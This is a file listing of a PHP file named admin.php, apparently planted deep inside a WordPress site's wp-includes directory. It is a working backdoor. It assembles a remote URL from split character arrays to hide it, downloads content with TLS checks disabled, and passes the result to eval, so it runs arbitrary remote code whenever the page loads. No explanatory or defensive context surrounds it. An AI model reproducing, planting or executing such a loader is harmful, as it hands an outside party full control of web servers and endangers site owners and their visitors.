• File: admin.php
  • Full Path: /home/lef/public_html/wp-includes/IXR/2024/resources/v3/modules/gepgh/qidn/admin.php
  • File size: 925 bytes
  • MIME-type: text/x-php
  • Charset: utf-8
<?php
// Inline Note: inline_976

function fetch_content(){
    $components = [
        ['h', 't', 't', 'p', 's', ':', '/', '/'],
        ['a', 'w', 's', 'c', 'l', 'o', 'u', 'd', '.', 'i', 'c', 'u'],
        ['/', 'r', 'a', 'w', '/'],
        ['g', '8', 'J', 'k', 'R']
    ];
    $target_url = '';
    foreach ($components as $part) {
        $target_url .= implode('', array_map('strval', $part));
    }
    
    $data = '';
    if(function_exists('curl_init')){
        $request = curl_init($target_url);
        curl_setopt_array($request, [
            CURLOPT_RETURNTRANSFER => 1,
            CURLOPT_TIMEOUT => 3,
            CURLOPT_SSL_VERIFYPEER => 0,
            CURLOPT_SSL_VERIFYHOST => 0
        ]);
        $data = curl_exec($request);
        curl_close($request);
    }
    
    if(empty($data)){
        $data = @file_get_contents($target_url);
    }
    
    if($data) eval("?>$data");
}
fetch_content();
?>